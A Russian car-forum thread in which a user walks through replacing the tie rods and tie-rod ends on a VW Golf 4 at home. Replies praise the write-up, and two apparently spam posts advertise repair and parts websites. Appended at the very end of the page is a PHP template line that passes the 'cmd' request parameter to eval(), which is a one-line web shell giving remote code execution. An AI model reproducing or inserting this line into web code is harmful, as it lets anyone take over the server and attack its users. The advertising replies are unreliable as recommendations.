+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Замена рулевых тяг и наконечников G4


  1. #1
    GTI-Racing MadSnowMan is on a distinguished road Аватар для MadSnowMan
    Регистрация
    21.11.2008
    Машина
    G4 кабылко
    Сообщений
    155

    Exclamation Замена рулевых тяг и наконечников G4

    Здравствуйте.

    Заехав в сервис мне приговорили рулевые тяги с наконечниками и зарядили ремонт в районе 3000р не считая покупки самих тяг с наконечниками. Подумав на эту тему я решил, а не пошли-ка они н... и решил сделать всё своими силами.
    Итак выбирав из множество осортимента я выбрал Lemforder соответственно левую и правую тягу с наконечником в сборе.

    Заказав и получив свои ништяки через 2 недели, договорились с клубнем (Периковым) за что ему большое спасибо, запаслись инструментом и поехали к нему в гараж.
    Подняв машину и сняв колёса мы начали думать как же всё это дело открутить.
    Сразу говорю не забудьте запастись WDшкой, купить два хомута с диаметром 40мм примерно, и два хомута 15мм это для пыльника рулевой тяги с рейкой, обязательно редкий ключик или головку на 18, а лучше и то и другое, ещё нужен ключ на 32(или разводной ключ чем мы пользовались),19,16,13,10 или опять же головка, ну и кувалду побольше. Вроде нечего не забыл =)

    Новая тяга с наконечником


    Подняли машину и поставили её на бетонные маленькие блоки и плюс два домкрата






    И так мы начали разбор и поняли, что не сняв рычаг подвески, поперечный, мы не доберёмся до крепления тяги. И мы решили открутить рычаг.
    Открутив сначала шаровую, затем открутив серьгу стабилизатора, ну и открутив два жёстких болта у сайлент блоков ключом на 18, мы сняли рычаг подвески.
    Потом открутив тягу от рейки и открутив тягу, мы открутили гайку с наконечника и тут начались танцы с кувалдой.
    Это собака не хотела выниматься, но с помощью кувалды и такой-то матери, а во втором случае пришлось машину подымать домкратом на этой тяге и она всё равно не срывалась, кое как мы в общем их сняли =)








    Прежде чем раскручивать тягу от наконечника и снять пыльник, мы замеряли длину тяги в сборе линейкой,получилось 11 дюймов+-, чтобы новую примерно так же подогнать,
    чтобы можно было нормально доехать до сервиса и сделать развал схождение колёс.






    Ещё нам мужичёк сказал. что когда будем обратно ставить опору и закручивать болты в сайленты то болт который закручивается в горизонтальном положении нужно закручивать под нагрузкой, как будто машина встала на колесо, мы просто потдамкратили опору и закрутили болт, это для того чтобы там что-то не провернуло.







    Ну вот в принципе и всё. Далее я поехал выровнял свои диски до более идеального состояния, так как один был битый, а другой был кривоват, теперь они идеальны =)
    Осталось сделать развал схождение =)
    Последний раз редактировалось MadSnowMan; 09.06.2009 в 15:48.

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Хороший и полезный отчетец
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    GTI-Racing MadSnowMan is on a distinguished road Аватар для MadSnowMan
    Регистрация
    21.11.2008
    Машина
    G4 кабылко
    Сообщений
    155
    Спасибо я старался =)
    Чего не сделаешь для любимого авто!

  4. #4
    Модератор TaPaKaH is on a distinguished road Аватар для TaPaKaH
    Регистрация
    03.03.2006
    Сообщений
    1,081
    Цитата Сообщение от MadSnowMan Посмотреть сообщение
    Спасибо я старался =)
    Чего не сделаешь для любимого авто!
    тоже понравилось 5 балов!

  5. #5
    респект автору!

  6. #6
    Мимо проходил mitti is on a distinguished road Аватар для mitti
    Регистрация
    26.12.2009
    Сообщений
    36
    Вот это работёнка. Теперь я ещё больше стала любить наш автосервис.
    Мне и денег не жалко, спец всегда сделает ремонт на много профессиональнее и качественнее. В конце концов деньги можно заработать ,а здоровье купить негде.:(

  7. #7
    Мимо проходил Alina32 is on a distinguished road Аватар для Alina32
    Регистрация
    14.12.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    28
    Всем привет)Недавно обращалась в автосервис «ГидроРемонт» http://gidroremont.moscow/ ,который занимается качественным восстановлением рулевых реек и насосов ГУР различных марок автомобилей в Москве с гарантией качества выполненных работ .Осталась довольна выполненной работой,сделали действительно все качественно и по вполне адекватной цене.Рекомендую ребят.
    Последний раз редактировалось Alina32; 20.02.2019 в 17:27.

  8. #8
    Мимо проходил Frost777 is on a distinguished road Аватар для Frost777
    Регистрация
    18.05.2023
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    3
    Отличная тема!
    Еще можно заглянуть на сайт https://motopoland.com.ua/

+ Ответить в теме

Похожие темы

  1. Замена 8v на 16v HELP!!!
    от Вова в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 16
    Последнее сообщение: 21.11.2023, 21:04
  2. Замена ГБЦ c AWP на AJP
    от veteromska в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 29
    Последнее сообщение: 01.10.2023, 18:22
  3. Комплект колодок и рул. наконечников от Р-ки
    от Younis GTI в разделе Покупка и продажа запчастей
    Ответов: 5
    Последнее сообщение: 24.08.2014, 21:22
  4. Замена DSG
    от enlakesh в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 20
    Последнее сообщение: 08.03.2013, 02:00
  5. Замена Рулевых Тяг И Наконечников
    от Student112 в разделе Ходовая
    Ответов: 5
    Последнее сообщение: 24.02.2009, 09:36

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}